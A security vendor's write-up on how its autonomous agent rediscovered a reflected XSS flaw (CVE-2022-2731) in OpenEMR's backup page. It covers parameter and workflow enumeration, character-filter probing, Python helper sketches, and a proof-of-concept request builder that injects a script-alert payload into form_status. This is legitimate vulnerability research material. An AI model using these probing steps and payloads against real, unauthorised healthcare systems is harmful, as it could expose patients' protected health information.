OpenEMR is a widely deployed open-source electronic health records system, serving over 100,000 medical providers worldwide and managing sensitive health information for millions of patients. When vulnerabilities exist in software handling protected health information, the consequences extend beyond technical exploitation to regulatory compliance failures and patient privacy breaches.
To evaluate Sara, our autonomous security agent, against real-world targets, we directed it at CVE-2022-2731, a reflected cross-site scripting vulnerability in OpenEMR’s backup interface originally discovered by the Secure D Center Research Team. Rather than testing against synthetic benchmarks, we wanted to understand how Sara would approach a production healthcare application with authentic complexity: authentication flows, multi-step workflows, and the kind of state management that characterizes enterprise software.
For healthcare organizations using OpenEMR, this vulnerability presents a real risk. An attacker would create a malicious URL with an XSS payload and send it to a clinic administrator, likely via an email impersonating a system notification (e.g., about backup failures or storage warnings). If the authenticated administrator clicks the link, the embedded JavaScript will execute in their browser session, granting the attacker full control over the OpenEMR backup interface.
Reflected XSS occurs when an application incorporates untrusted data from an HTTP request directly into the response without proper sanitization. Unlike stored XSS, where malicious scripts persist in the database and affect all visitors, reflected XSS is transient; the payload exists only in a crafted URL or form submission.
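To make the definition concrete, here is a minimal sketch of the vulnerable pattern next to an escaped variant. It is a generic Python illustration, not OpenEMR’s PHP code; the function names and the sample payload are assumptions introduced only for this example.

```python
import html


def render_unsafe(status: str) -> str:
    # Vulnerable pattern: request data is concatenated into markup as-is,
    # so any tags it contains become part of the page.
    return f"<p>Status: {status}</p>"


def render_escaped(status: str) -> str:
    # Safer pattern: HTML metacharacters (&, <, >, quotes) are encoded
    # before the value is written into the response.
    return f"<p>Status: {html.escape(status, quote=True)}</p>"


# Hypothetical payload, as it might arrive in a crafted URL parameter.
payload = "<script>alert('XSS')</script>"

print(render_unsafe(payload))   # script tag survives intact
print(render_escaped(payload))  # script tag is rendered inert
```

The only difference between the two functions is the encoding step applied at output time, which is exactly the step a reflected XSS flaw is missing.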
The vulnerability was disclosed through Huntr and assigned a CVSS score of 5.4 (Medium). What follows is a detailed examination of how Sara independently rediscovered and validated this vulnerability, demonstrating the systematic methodology that enables autonomous security testing at scale.
Setting the Stage
To make the evaluation controlled and reproducible, we cloned the OpenEMR codebase and checked out commit hash 285fb234bd27ea4c46a29f2797edda7f38f1d8db, locking the environment to the exact historical state in which the vulnerability existed. This isolated the application at the moment the security flaw was present and gave Sara a stable foundation for its autonomous investigation.
Reconnaissance and Discovery
The Session Error Pivot
Once the OpenEMR application was running, the agent’s first attempt to access it hit an immediate obstacle: a session error.
Using browser automation, the agent navigated to the login page, filled in the provided credentials (admin/pass), and authenticated successfully.
The agent then extracted the session identifier:
The agent then crawled the application, including the vulnerable page /interface/main/backup.php, a single PHP page responsible for creating and managing database backups. Its initial objective was to systematically test every user-controlled input on this page for XSS vulnerabilities.
Discovering the State Machine
With authentication complete, the agent captured the page structure and immediately identified something that would prove critical: this wasn’t a simple single-page form. JavaScript comments in the source code revealed a sophisticated multi-step workflow:
The agent then systematically enumerated 22 distinct form_step values to map the entire state machine:
| form_step value(s) | Response length (lines) | Behavior |
|---|---|---|
| 0 | 100 | Initial state |
| 1-5 | 90 | Backup process (2 reflection points) |
| 101 | 292 | Export configuration (3x larger) |
| 102.1, 102.2 | 0 | File downloads (empty response) |
| 201 | 94 | Import/upload form |
| 405 | 71 | Delete operation (no reflection) |
Step 101 exposed 13 additional parameters that are invisible in other states, including form_cb_services, form_cb_products, and form_sel_lists[]. Each one required testing. One anomaly stood out: step 405, the delete operation, showed zero reflections, while every other non-download state reflected the canary string at least once. The code path handling destructive operations appeared to implement stricter controls. Whether by design or coincidence, the delete function was hardened against this vulnerability class while the export and backup operations were not.
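The state-mapping pass described above can be sketched roughly as follows. This is an illustration under stated assumptions, not Sara’s actual implementation: `map_states` and `fake_send` are hypothetical names, the transport is abstracted behind a callable so the example runs offline, and the stand-in server only mimics the observation that step 405 does not reflect input.

```python
from typing import Callable, Dict, Iterable, Tuple
from urllib.parse import parse_qs, urlencode

CANARY = "xss7e8f2a"  # canary string quoted in the write-up


def map_states(
    steps: Iterable[str],
    param: str,
    send: Callable[[str], str],
) -> Dict[str, Tuple[int, int]]:
    """For each form_step value, record (response line count, canary hits)."""
    results = {}
    for step in steps:
        # One request per state, with the canary planted in a single parameter.
        body = urlencode({"form_step": step, param: CANARY})
        response = send(body)
        results[step] = (len(response.splitlines()), response.count(CANARY))
    return results


def fake_send(body: str) -> str:
    """Hypothetical stand-in for the HTTP round trip (no network involved)."""
    fields = parse_qs(body)
    step = fields["form_step"][0]
    value = fields.get("form_status", [""])[0]
    if step == "405":
        # Mimics the hardened delete path: input is never echoed back.
        return "<html>\n<p>Deleted</p>\n</html>"
    return f"<html>\n<p>{value}</p>\n<input value='{value}'>\n</html>"


summary = map_states(["0", "405"], "form_status", fake_send)
for step, (lines, hits) in summary.items():
    print(f"step={step} lines={lines} reflections={hits}")
```

Recording both the response size and the reflection count per state is what makes outliers such as an unusually large page or a state with zero reflections stand out in the resulting table.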
Before finding the vulnerable parameter, Sara tested 34 input vectors that showed no reflection. This reconnaissance is how the agent tests an application thoroughly rather than checking only the most likely inputs.
Sara tested common parameter names that might accept reflected input:
HTTP Headers (5 tested, 0 vulnerable):
Step 101 Parameters (10+ tested, 0 vulnerable):
The export configuration state exposed additional form fields. Sara tested each one:
Finding Reflection
With the attack surface mapped (22 workflow states, 27 parameters, 5 HTTP headers, and URI paths), Sara moved on to context identification. Using a unique canary string (xss7e8f2a), it probed each parameter for reflection.
The response revealed what 34 previous tests had not: the canary was reflected from the form_status parameter, in two distinct contexts.
Reflection Context 1 – HTML Body (Line 72):
Reflection Context 2 – HTML Attribute (Line 78):
The dual reflection is significant. The body context allows direct script injection; the attribute context offers an alternative vector through event handlers if the body context were filtered. Neither appeared to be sanitized, but Sara needed to confirm that systematically before attempting exploitation.
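The distinction between body and attribute contexts can be checked mechanically. The sketch below uses Python’s standard `html.parser` to report where a canary lands; the `ReflectionFinder` class and the sample markup are assumptions made for illustration and do not reproduce the actual backup.php response.

```python
from html.parser import HTMLParser


class ReflectionFinder(HTMLParser):
    """Collects (line, context, detail) for every place the canary appears."""

    def __init__(self, canary: str):
        super().__init__(convert_charrefs=True)
        self.canary = canary
        self.hits = []

    def handle_starttag(self, tag, attrs):
        line, _ = self.getpos()
        for name, value in attrs:
            # Canary inside an attribute value: event-handler or
            # quote-breakout payloads apply here.
            if value and self.canary in value:
                self.hits.append((line, "attribute", f"{tag}[{name}]"))

    def handle_data(self, data):
        # Canary inside text content: direct tag injection applies here.
        if self.canary in data:
            line, _ = self.getpos()
            offset = data.index(self.canary)
            line += data.count("\n", 0, offset)
            self.hits.append((line, "body", data.strip()))


# Hypothetical response fragment with one reflection in each context.
sample = (
    "<html>\n"
    "<p>Status: xss7e8f2a</p>\n"
    "<input type='hidden' name='form_status' value='xss7e8f2a'>\n"
    "</html>"
)

finder = ReflectionFinder("xss7e8f2a")
finder.feed(sample)
finder.close()
for hit in finder.hits:
    print(hit)
```

Knowing the context up front matters because it determines which characters a payload needs: angle brackets for the body context, quotes for breaking out of the attribute.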
Probing the Parameter
Rather than immediately spraying XSS payloads, the agent followed a systematic approach, testing individual special characters to learn exactly which ones the application would pass through.
First, a combined probe:
Then, character by character isolation:
The responses came back unchanged:
The agent documented its findings methodically:
| Character | Filter Behavior |
|---|---|
| < | Passed through |
| > | Passed through |
| " | Passed through |
| ' | Passed through |
| ; | Passed through |
| / | Passed through |
| \ | Passed through |
This confirmed that form_status is reflected with no encoding, filtering, or sanitization of any character tested.
This was the moment the agent’s systematic approach paid off. With both angle brackets and quotes passing through unencoded, XSS exploitation was highly likely.
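Character-level probing of this kind can be sketched as follows. The approach of wrapping each character between a start and an end marker is an assumption of this example (the write-up names only a single canary), and `make_probe`, `classify`, and the `END` marker are hypothetical names.

```python
import html
import re

START = "xss7e8f2a"  # canary from the write-up
END = "a2f8e7ssx"    # assumed closing marker, introduced for this sketch


def make_probe(char: str) -> str:
    """Wrap one special character between two markers."""
    return f"{START}{char}{END}"


def classify(char: str, response_body: str) -> str:
    """Describe what happened to `char` between the markers in the response."""
    pattern = re.escape(START) + r"(.*?)" + re.escape(END)
    match = re.search(pattern, response_body, re.S)
    if match is None:
        return "Not reflected"
    seen = match.group(1)
    if seen == char:
        return "Passed through"
    if seen == "":
        return "Stripped"
    if html.unescape(seen) == char:
        return "HTML-encoded"
    return "Transformed"


# Hypothetical responses showing each outcome for the '<' character.
print(classify("<", f"<p>{make_probe('<')}</p>"))        # unfiltered echo
print(classify("<", f"<p>{START}&lt;{END}</p>"))         # entity-encoded echo
print(classify("<", f"<p>{START}{END}</p>"))             # character removed
```

Testing one character per request keeps the results unambiguous: if a combined probe comes back altered, it is not obvious which character triggered the filter.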
Crafting a Payload
With the sanitization profile complete, the agent selected the most straightforward payload for the HTML body context:
The payload was reflected verbatim in the response body. An intact script tag in the response is strong evidence of an XSS vulnerability, but reflection alone isn’t enough to prove exploitation; Sara still needed to prove execution.
Validating the Vulnerability
Finding reflected content in an HTTP response is not the same as confirming exploitability. Security scanners frequently flag reflection without verifying that the payload actually executes in a browser context, a gap that produces false positives and reduces confidence in automated findings. Sara’s methodology requires browser-based validation. If the JavaScript doesn’t execute in a real rendering engine, the vulnerability isn’t reported.
To confirm exploitation, Sara constructed a PoC using Playwright that simulates the complete attack chain. The automation authenticates to OpenEMR, extracts a valid CSRF token from the backup interface, injects the XSS payload into the form_status parameter, and submits the form. A dialog handler captures any JavaScript alerts triggered during page rendering.
The browser returned a dialog event with the message “XSS”, confirming that the injected script executed in the authenticated session context. This validation step is what separates Sara’s findings from those of pattern-matching scanners: the finding is reported not because the payload appears in the response, but because it runs.
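The request-construction half of that attack chain (token extraction and payload placement) can be sketched without a browser; the execution check itself still requires a real rendering engine, as described above. This is a stdlib-only illustration, not Sara’s Playwright PoC. The token field name `csrf_token_form`, the sample form markup, and the payload string are all assumptions of this example.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode


class HiddenFields(HTMLParser):
    """Collects name/value pairs of hidden <input> elements."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        is_hidden = (attr.get("type") or "").lower() == "hidden"
        if tag == "input" and is_hidden and attr.get("name"):
            self.fields[attr["name"]] = attr.get("value") or ""


def build_poc_body(page_html: str, payload: str,
                   token_field: str = "csrf_token_form") -> str:
    """Reuse the page's hidden fields (including the CSRF token) and
    place the payload in form_status."""
    parser = HiddenFields()
    parser.feed(page_html)
    parser.close()
    if token_field not in parser.fields:
        raise ValueError(f"no hidden field named {token_field!r} found")
    fields = dict(parser.fields)
    fields["form_status"] = payload
    return urlencode(fields)


# Hypothetical fragment of the backup form as served to a logged-in user.
sample_page = (
    "<form method='post'>\n"
    "<input type='hidden' name='csrf_token_form' value='abc123'>\n"
    "<input type='hidden' name='form_step' value='1'>\n"
    "<input type='hidden' name='form_status' value=''>\n"
    "</form>"
)

body = build_poc_body(sample_page, "<script>alert('XSS')</script>")
print(body)
```

Carrying the page’s own hidden fields forward keeps the forged submission valid from the application’s point of view, so the only thing that differs from a legitimate request is the injected form_status value.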
Sara then performed a secondary validation. Alert dialogs can be suppressed by browser configurations or security tools, so it injected a payload that modified the DOM directly:
The browser rendered the injected content:
Both independent validation methods succeeded, so the finding rests on observed execution rather than on reflection alone.
The Impact
With script execution in an administrator’s session, an attacker can exfiltrate session tokens to maintain persistent access, intercept database exports as they’re generated, or modify backup parameters to exclude audit logs that might reveal the compromise. Because the backup interface handles complete database dumps, a successful attack provides access to patient demographics, diagnoses, medication histories, insurance information, and clinical notes: the full spectrum of protected health information.
Under HIPAA, unauthorized access to PHI triggers breach notification requirements. A clinic discovering this exploitation would face mandatory reporting to affected patients, the Department of Health and Human Services, and potentially media outlets if the breach affects more than 500 individuals. Beyond regulatory penalties, the provider would suffer reputational damage from a flaw in administrative tooling: systems that patients never see but that determine whether their medical histories remain confidential.
The CVSS score of 5.4 (Medium) reflects the requirement for user interaction and authenticated access. In practice, the severity depends entirely on context. A single physician practice and a hospital network running the same vulnerable code face vastly different exposure and risk profiles.
Conclusion
CVE-2022-2731 does not require intricate exploitation chains, novel bypass techniques or multi-stage attacks. The flaw is a failure to sanitize user input before reflecting it in HTML. Yet this vulnerability persisted in production healthcare software, in an interface accessed by administrators with database export privileges.
What this exercise demonstrates is Sara’s capacity for thorough, systematic coverage. Sara enumerated 22 distinct workflow states, tested 27 parameters across each state, probed 5 HTTP headers, and validated character level filter behavior before constructing a working payload. It authenticated when blocked, adapted when the application presented a state machine rather than a simple form, and confirmed exploitation through actual browser execution rather than simple pattern matching.
This is the work that doesn’t happen in time-constrained manual assessments. A penetration tester with a week-long engagement might test the backup interface, find no obvious issues with the primary form fields, and move on. Sara tested form_status because it tested everything, including parameters that only appear in specific workflow states, inputs that seem purely informational, and contexts that don’t obviously accept user data.
For organizations handling protected health information, systematic testing finds oversights. The next vulnerability may not be in backup.php. It may be in an export function, a configuration page or an administrative workflow that sees limited security scrutiny precisely because it requires elevated privileges to access. Sara’s methodology scales to find these gaps before attackers do.